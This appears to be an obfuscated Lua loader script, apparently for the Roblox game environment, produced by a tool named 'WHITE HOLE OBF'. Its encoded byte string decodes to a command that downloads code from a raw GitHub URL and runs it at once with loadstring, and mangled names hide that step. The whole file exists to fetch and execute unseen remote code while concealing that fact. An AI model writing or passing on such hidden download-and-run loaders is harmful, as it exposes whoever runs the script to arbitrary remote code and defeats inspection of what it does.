-- WHITE HOLE OBF V1.0, https://white-hole-obf.vercel.app/
local function I1I1111Il1lIl1l()
    local III1111IlII1IlI = "\173\176\162\165\180\181\179\170\175\168\105\168\162\174\166\123\137\181\181\177\136\166\181\105\104\169\181\181\177\180\123\112\112\179\162\184\111\168\170\181\169\182\163\182\180\166\179\164\176\175\181\166\175\181\111\164\176\174\112\180\186\162\167\162\162\181\179\115\116\117\110\165\166\180\170\168\175\112\142\130\143\148\150\138\112\179\166\167\180\112\169\166\162\165\180\112\174\162\170\175\112\142\162\175\180\150\170\104\106\106\105\106"
    local Il1II11I1l1II1I = {}
    
    for Illl1lIIIIl11Il = 1, #III1111IlII1IlI do
        table.insert(Il1II11I1l1II1I, string.char((III1111IlII1IlI:byte(Illl1lIIIIl11Il) - 65) % 256))
    end
    
    local Il1lllI1Il11l11 = table.concat(Il1II11I1l1II1I)
    local IlI1I1I1I11l11l = (loadstring or load)
    
    if IlI1I1I1I11l11l then
        local f = IlI1I1I1I11l11l(Il1lllI1Il11l11)
        if f then
            pcall(f)
        end
    end
end

I1I1111Il1lIl1l()
